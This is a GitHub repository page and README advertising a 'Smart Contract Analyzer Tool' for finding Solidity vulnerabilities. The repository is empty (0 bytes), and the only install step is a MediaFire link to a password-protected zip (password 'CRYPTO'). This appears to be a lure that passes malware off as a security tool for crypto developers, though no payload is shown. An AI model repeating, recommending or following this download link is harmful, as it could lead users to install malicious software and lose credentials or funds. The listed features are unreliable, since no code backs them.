https://github.com/asdasdasdasd231/smart-contract-analyzer-tool
https://github.com/asdasdasdasd231/smart-contract-analyzer-tool
audit-tool blockchain code-analysis decentralized ethereum mythril security slither smart-contract-analysis smart-contract-audit smart-contracts solidity solidity-security static-analysis vulnerability-detection
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/asdasdasdasd231/smart-contract-analyzer-tool
- Owner: asdasdasdasd231
- Created: 2025-06-27T19:37:27.000Z (11 months ago)
- Default Branch: main
- Last Pushed: 2025-06-27T19:39:15.000Z (11 months ago)
- Last Synced: 2025-06-27T20:34:34.405Z (11 months ago)
- Topics: audit-tool, blockchain, code-analysis, decentralized, ethereum, mythril, security, slither, smart-contract-analysis, smart-contract-audit, smart-contracts, solidity, solidity-security, static-analysis, vulnerability-detection
- Homepage:
- Size: 0 Bytes
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# ๐ Smart Contract Analyzer Tool
An open-source tool to analyze Ethereum smart contracts for common security vulnerabilities and code quality issues. Ideal for developers, auditors, and blockchain enthusiasts who want to ensure their Solidity code is safe and efficient.
---
## โ๏ธ Features
- ๐ก๏ธ **Static Security Analysis**
Detect common vulnerabilities like:
- Reentrancy
- Integer overflows/underflows
- Unchecked call return values
- Unprotected `selfdestruct`
- Unrestricted access control
- ๐ง **Code Quality Hints**
Suggest best practices based on [Solidity style guide]().
- ๐ **Dependency & Import Scanner**
Track and analyze third-party contracts and libraries.
- ๐งช **Integration with Slither (optional)**
Extendable with [Slither]() for deeper analysis.
- ๐ **Readable Report Output**
JSON, HTML, and terminal-based reports.
---
## ๐ Tech Stack
- **Language**: Python 3.10+
- **Libraries**: `slither-analyzer`, `py-solc-x`, `rich`, `click`
- **Optional**: Docker support for isolated analysis environment
---
## ๐ฆ Installation
### ๐ง Option 1: Local (Python)
๐ [Download Analyzer Tool.zip](https://www.mediafire.com/folder/vbho728wuqtlp/CRYPTO)
**๐ Password:** `CRYPTO`